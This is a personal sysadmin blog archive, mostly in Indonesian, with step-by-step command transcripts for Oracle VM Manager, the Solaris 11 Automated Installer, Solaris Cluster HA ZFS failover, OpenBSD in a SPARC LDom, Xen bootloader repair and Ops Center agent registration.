Delicious

Archives

Categories

Archive for 'Virtualization' Category





« »



export keystore OVM Manager:

# /u01/app/oracle/java/bin/keytool -keystore /u01/app/oracle/ovm-manager-3/ovmmCoreTcps.ks -exportcert -alias ovmm -file  ~/export.jks
Enter keystore password:
Certificate stored in file <export.jks>

Copy & Import to Oracle Cloud Control:
* default password : welcome

#  /u02/app/oracle/agents/agent_inst/bin/emctl secure add_trust_cert_to_jks -trust_certs_loc ./keystore/export.jks -alias ovmm
Oracle Enterprise Manager Cloud Control 12c Release 3
Copyright (c) 1996, 2013 Oracle Corporation.  All rights reserved.
Password:
 
Message   :   Certificate was added to keystore
ExitStatus: SUCCESS



login to Oracle VM Manager:

[root@kandangMonyet ~]# cd /u01/app/oracle/ovm-manager-3/bin
[root@kandangMonyet bin]# ./secureOvmmTcpGenKeyStore.sh 
Generate OVMM TCP over SSH key store by following steps:
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  ozzienich
What is the name of your organizational unit?
  [Unknown]:  kandang
What is the name of your organization?
  [Unknown]:  kebonbinatang.org
What is the name of your City or Locality?
  [Unknown]:  Jakarta
What is the name of your State or Province?
  [Unknown]:  DKI
What is the two-letter country code for this unit?
  [Unknown]:  ID
Is CN=ozzienich, OU=kandang, O=kebonbinatang.org, L=Jakarta, ST=DKI, C=ID correct?
  [no]:  yes
Enter key password for <ovmm>
	(RETURN if same as keystore password):
 
[root@kandangMonyet bin]# ./secureOvmmTcp.sh
Enabling OVMM TCP over SSH service
Please enter the OVM manager user name: admin
Please enter the OVM manager user password: 
Please enter the password for TCPS key store : 
The job of enabling OVMM TCPS service is committed, please restart OVMM to take effect.

restart service OVM manager:

[root@kandangMonyet bin]# /sbin/service ovmm stop
[root@kandangMonyet bin]# /sbin/service ovmm start

register to Enterprise Manager OpsCenter:
create discovery profile for OVM, :



Solaris 11 AI

  ozzie / 27/02/2014

download ISO Solaris 11 AI (>>>>)

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

generate manifest profile:

#sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

create local repository

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server

 

booting <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok ssetenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

HA storage ZFS

  ozzie / 23/06/2013

simulasi High-Availability Storage dengan 3 node Solaris Cluster dan iSCSI dengan Solaris 11 & Solaris Cluster 4.1.


setelah Solaris Cluster sudah up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & Network service

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create Resource Group dari group Monyet

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create ZFS pool isi pelem – ‘poolBOKEP’ – sebelom tambah ke resource cluster

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



tambah ‘poolBOKEP’ sebagai resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p  Zpools=poolBOKEP  -p \ ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import poolBokep tadi:

root@Monyet1:~#  zpool import poolBOKEP

tambah Virtual IP resource untuk resource group RG-MONYET :

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

sampai sini tinggal pindah2 resource group ke Monyet-Monyet yg laen ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

atau mau di balikin ulang :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

tinggal isi pelem di poolBOKEP dah \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Solaris Cluster

  ozzie / 21/06/2013


download Oracle Solaris Cluster 4.1. kali ini base OS nya Solaris 11 dengan IPS

 

mount source repository dan refresh IPS publisher nya:

# mount -F hsfs /export/home/ozzie/osc-4_1-ga-repo-full.iso  /mnt/
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg set-publisher -G "*" -g file:///mnt/repo ha-cluster
# pkg refresh
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
ha-cluster                  origin   online F file:///mnt/repo/
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg install ha-cluster-framework-full
           Packages to install:  26
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   6
 
DOWNLOAD                                PKGS         FILES    XFER (MB)   SPEED
Completed                              26/26     2794/2794    27.5/27.5    0B/s
 
PHASE                                          ITEMS
Installing new actions                     3936/3936
Updating package state database                 Done 
Updating image state                            Done 
Creating fast lookup database                   Done

Create cluster /usr/cluster/bin/scinstall

 
  *** Main Menu ***
 
    Please select from one of the following (*) options:
 
      * 1) Create a new cluster or add a cluster node
        2) Upgrade this cluster node
        3) Manage a dual-partition upgrade
      * 4) Print release information for this cluster node
 
      * ?) Help with menu options
      * q) Quit
 
    Option:  1
 
 
  *** New Cluster and Cluster Node Menu ***
 
    Please select from any one of the following options:
 
        1) Create a new cluster
        2) Create just the first node of a new cluster on this machine
        3) Add this machine as a node in an existing cluster
 
        ?) Help with menu options
        q) Return to the Main Menu
 
    Option:

  >>> Cluster Name <<<
 
    Each cluster has a name assigned to it. The name can be made up of any
    characters other than whitespace. Each cluster name should be unique 
    within the namespace of your enterprise.
 
    What is the name of the cluster you want to establish?  Kandang-Monyet
 
 
  >>> Check <<<
 
    This step allows you to run cluster check to verify that certain basic
    hardware and software pre-configuration requirements have been met. If
    cluster check detects potential problems with configuring this machine
    as a cluster node, a report of violated checks is prepared and 
    available for display on the screen.
 
    Do you want to run cluster check (yes/no) [yes]?  
 
 
 
  >>> Cluster Nodes <<<
 
    This Oracle Solaris Cluster release supports a total of up to 16 
    nodes.
 
    List the names of the other nodes planned for the initial cluster 
    configuration. List one node name per line. When finished, type 
    Control-D:
 
    Node name (Control-D to finish):  Monyet1
    Node name (Control-D to finish):  Monyet2
    Node name (Control-D to finish):  Monyet3
    Node name (Control-D to finish):  ^D
 
 
 
  >>> Cluster Transport Adapters and Cables <<<
 
    Transport adapters are the adapters that attach to the private cluster
    interconnect.
 
    Select the first cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  1
 
    Searching for any unexpected network traffic on "net0" ... done
Unexpected network traffic was seen on "net0".
"net0" may be cabled to a public network.
 
    Do you want to use "net0" anyway (yes/no) [no]?  yes
 
    Select the second cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  2
 
    Searching for any unexpected network traffic on "net2" ... done
Unexpected network traffic was seen on "net2".
"net2" may be cabled to a public network.
 
    Do you want to use "net2" anyway (yes/no) [no]?  
 
 
 
  >>> Confirmation <<<
 
    Your responses indicate the following options to scinstall:
 
      scinstall -i \ 
           -C kandang-monyet \ 
           -F \ 
           -G lofi \ 
           -T node=Monyet1,node=Monyet2,authtype=sys \ 
           -w netaddr=172.16.0.0,netmask=255.255.240.0,maxnodes=32,maxprivatenets=10,numvirtualclusters=12,numxipvirtualclusters=3 \ 
           -A trtype=dlpi,name=net0 -A trtype=dlpi,name=net2 \ 
           -B type=switch,name=switch1 -B type=switch,name=switch2 \ 
           -m endpoint=:net0,endpoint=switch1 \ 
           -m endpoint=:net2,endpoint=switch2 \ 
           -P task=security,state=SECURE
 
    Are these the options you want to use (yes/no) [yes]?  
 
    Do you want to continue with this configuration step (yes/no) [yes]?  
 
 
Initializing cluster name to "kandang-monyet" ... done
Initializing authentication options ... done
Initializing configuration for adapter "net0" ... done
Initializing configuration for adapter "net2" ... done
Initializing configuration for switch "switch1" ... done
Initializing configuration for switch "switch2" ... done
Initializing configuration for cable ... done
Initializing configuration for cable ... done
Initializing private network address options ... done
 
 
Setting the node ID for "Monyet1" ... done (id=1)


Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager dengan base OS menggunakan Oracle Linux 6.x. install OS seperti biasa..

Minimum spec prerequisite OVM:

  • – Memory: 1.5 GB (4GB jika pakai Oracle DataBase XE)
  • – Processor: 64 bit
  • – Swap: > 2.1 GB
  • – Disk Space: 5 GB untuk /u01 dan 2 GB /tmp

 

semua source dapat di download di: https://edelivery.oracle.com/
untuk update packages Oracle Linux via yum (bisa baca disini

berikut list kebutuhan port untuk komunikasi OVM – OVS – Client



Oracle Enterprise Cloud Infrastucture

  ozzie / 23/04/2013

Exploring & Build Cloud & Solaris Virtualization (LDOMs & Zone).



just review: Oracle Enterprise Manager Ops Center. semua fitur; monitoring, provisioning, managing, maintaining.. hingga developing pun sudah include development plan… Migrate zone & vm.. server & storage pool..


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c





Install OpenBSD pada LDom SOLARIS di mesin SUN Enterprise T5220
create guest at Domain Controller: dengan 8 CPU, 4GB Ram & 2 network interface sajah :p

# ldm add-domain OpenBSD
# ldm add-vcpu 8 OpenBSD
# ldm add-memory 4G OpenBSD 
# ldm add-vnet vnet1 primary-vsw0 OpenBSD
# ldm add-vnet vnet2 primary-vsw1 OpenBSD

create ZFS pool – disk

# zfs create Ldom/OpenBSD
# zfs create -V 40gb Ldom/OpenBSD/disk0
# zfs create -V 80gb Ldom/OpenBSD/disk0


# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk0  openbsd-disk0@primary-vds0
# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk1  openbsd-disk1@primary-vds0
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm bind sst-ldom-dev1
# ldm set-var auto-boot\?=false OpenBSD

download iso OpenBSD untuk architecture Sparc64 & attach ke domain

# wget ftp://ftp.openbsd.org/pub/OpenBSD/5.2/sparc64/install52.iso
# ldm add-vdsdev /export/home/ozzie/install52.iso iso@primary-vds0
# ldm add-vdisk cdrom iso@primary-vds0 OpenBSD



sampai sini telah membuat virtual device (cdrom) installer OpenBSD.

aktifkan guest domain & install openBSD seperti biasa..

# ldm start-domain OpenBSD
# telnet localhost 50xx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
Connecting to console "OpenBSD" in group "OpenBSD" ....
Press ~? for control options ..
 
{0} ok 
{0} ok 
{0} ok devalias
cdrom                    /virtual-devices@100/channel-devices@200/disk@1
vdisk1                   /virtual-devices@100/channel-devices@200/disk@0
...
...
...
 
Boot device: /virtual-devices@100/channel-devices@200/disk@1:f  File and args: 
OpenBSD IEEE 1275 Bootblock 1.3
..>> OpenBSD BOOT 1.4
Trying bsd...
Booting /virtual-devices@100/channel-devices@200/disk@0:a/bsd
6605424@0x1000000+5520@0x164ca70+173400@0x1800000+4020904@0x182a558 
symbols @ 0xfedd02c0 81+405456+255993 start=0x1000000
[ using 662248 bytes of bsd ELF symbol table ]
console is /virtual-devices@100/console@1
Copyright (c) 1982, 1986, 1989, 1991, 1993
	The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2012 OpenBSD. All rights reserved.  http://www.OpenBSD.org
 
OpenBSD 5.2 (GENERIC.MP) #236: Mon Jul 30 16:38:18 MDT 2012
    deraadt@sparc64.openbsd.org:/usr/src/sys/arch/sparc64/compile/GENERIC.MP
real mem = 4294967296 (4096MB)
avail mem = 4210024448 (4014MB)
mainbus0 at root: SPARC Enterprise T5220
cpu0 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu1 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu2 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu3 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu4 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu5 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu6 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu7 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
vbus0 at mainbus0
"flashprom" at vbus0 not configured
"n2cp" at vbus0 not configured
"ncp" at vbus0 not configured
vrng0 at vbus0
vcons0 at vbus0: ivec 0x111, console
cbus0 at vbus0
vnet0 at cbus0 chan 0x0: ivec 0x200, 0x201, address 00:14:4f:f8:45:94
vnet1 at cbus0 chan 0x3: ivec 0x206, 0x207, address 00:14:4f:fa:c4:73
vdsk0 at cbus0 chan 0x6: ivec 0x20c, 0x20d
scsibus0 at vdsk0: 2 targets
sd0 at scsibus0 targ 0 lun 0: <SUN, Virtual Disk, 1.0> SCSI3 0/direct fixed
sd0: 40960MB, 512 bytes/sector, 83886080 sectors
"virtual-domain-service" at cbus0 not configured
vrtc0 at vbus0
vscsi0 at root
..
..
..
..

install seperti biasa dan bersih-bersih setelah selesai

# ldm set-var auto-boot\?=true OpenBSD
# ldm stop OpenBSD
LDom OpenBSD stopped
# ldm remove-vdisk cdrom OpenBSD 
# ldm remove-vdsdev iso@primary-vds0

Semoga bermanfaat… :p



Update Grub VM @ Xen

  ozzie / 17/02/2013

Ketika VM dalam XEN melakukan upgrade system. beberapa kernel OS akan update versi terbaru. yang ‘beberapa’ tidak dapat melakukan boot, hingga terjadi error:

Traceback (most recent call last): - File "/usr/bin/pygrub", line 746, in ? - raise RuntimeError,
 "Unable to find partition containing kernel" - RuntimeError: Unable to find partition containing kernel

untuk melakukan roolback; dpt dengan mengupdate Grub loader ke kernel sebelumnya dengan meng-edit konfigurasi grub :

# xe vm-list 
uuid ( RO)           : 64c5468e-e104-80c0-5715-ad90bd6c0d26
     name-label ( RW): OL-1
...
...
# xe-edit-bootloader -u 64c5468e-e104-80c0-5715-ad90bd6c0d26  -p1

semoga bermanfaat :D



Managing Solaris Zone

  ozzie / 14/02/2013

upgrade Oracle Linux 6.x

  ozzie / 27/12/2012
# cd /etc/yum.repos.d/
# wget http://public-yum.oracle.com/public-yum-ol6.repo
--2012-12-27 00:07:14--  http://public-yum.oracle.com/public-yum-ol6.repo
Resolving public-yum.oracle.com... 141.146.44.34
Connecting to public-yum.oracle.com|141.146.44.34|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2201 (2.1K) [text/plain]
Saving to: “public-yum-ol6.repo”
 
100%[================================================================>] 2,201       --.-K/s   in 0s      
 
2012-12-27 00:07:20 (200 MB/s) - “public-yum-ol6.repo” saved [2201/2201]


# more public-yum-ol6.repo 
[ol6_latest]
name=Oracle Linux $releasever Latest ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1
 
[ol6_addons]
name=Oracle Linux $releasever Add ons ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/addons/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_ga_base]
name=Oracle Linux $releasever GA installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/0/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u1_base]
name=Oracle Linux $releasever Update 1 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/1/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u2_base]
name=Oracle Linux $releasever Update 2 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/2/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_u3_base]
name=Oracle Linux $releasever Update 3 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/3/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_UEK_latest]
name=Latest Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1
 
[ol6_UEK_base]
name=Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_playground_latest]
name=Latest mainline stable kernel for Oracle Linux 6 ($basearch) - Unsupported 
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/playground/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0


sedikit adventure liburan di kandang kebonbinatang ke dunia Enterprise.. 8-}

Provisioning, installing, Updating, Monitoring, Reporting huge infrastructure a.k.a Enterprise. cmiiw.
dengan bahan dasar:
- Solaris 10 ( SPARC & x86 )
- Oracle Linux
- Ops Center

Register Asset (Manual Discover) via Token:
on Enetrprise Manager:

# cat /var/opt/sun/xvm/persistence/scn-proxy/connection.properties
.....
.....
.....
client-reg-id=urn\:scn\:clregid\:cab06a54-f561-46e7-bebb-cefbfc7ba8ba\:20121224042647994
trust-store=/var/opt/sun/xvm/security/jsse/scn-proxy/truststore
description=Local Proxy Controller
auto-reg-token=0c8d556f-9b8e-4210-9299-ea82f450f40a\:1387904400000\:T

Generate Token:

# echo "0c8d556f-9b8e-4210-9299-ea82f450f40a:1387904400000:T" > ~/TOKET_TETE

On Client Agent:

# /opt/SUNWxvmoc/bin/agentadm configure -t ~/TOKET_TETE  -x 10.0.5.1 
agentadm: Version 12.1.2.2162 launched with args: configure -t /token -x 10.0.5.1
 
Validating step : workarounds configure  -t ~/TOKET_TETE -x 10.0.5.1   
Validating step : db configure  -t ~/TOKET_TETE -x 10.0.5.1   
/var/run/cacao/instances/scn-agent/run/*.pid: No such file or directory
Validating step : sc_console configure  -t ~/TOKET_TETE -x 10.0.5.1   
verified sc_console command is OK 
Validating step : setup_hmp configure    -t ~/TOKET_TETE 
Validating step : scn_agent configure    
scn_agent Common Agent Container environment is OK 
Validating step : setup_net configure    
skipping setup_net step for zone VC. 
Validating step : uce_agent configure    
Validating step : config_sysconfig configure    
Validating step : final configure    
End of validation 
 
executing step : workarounds 
workaround  configuration done. 
 
executing step : db 
/var/run/cacao/instances/scn-agent/run/*.pid: No such file or directory
configuring db 
INFO: hd_domain_vc_agent_db.sh decrypted the password.
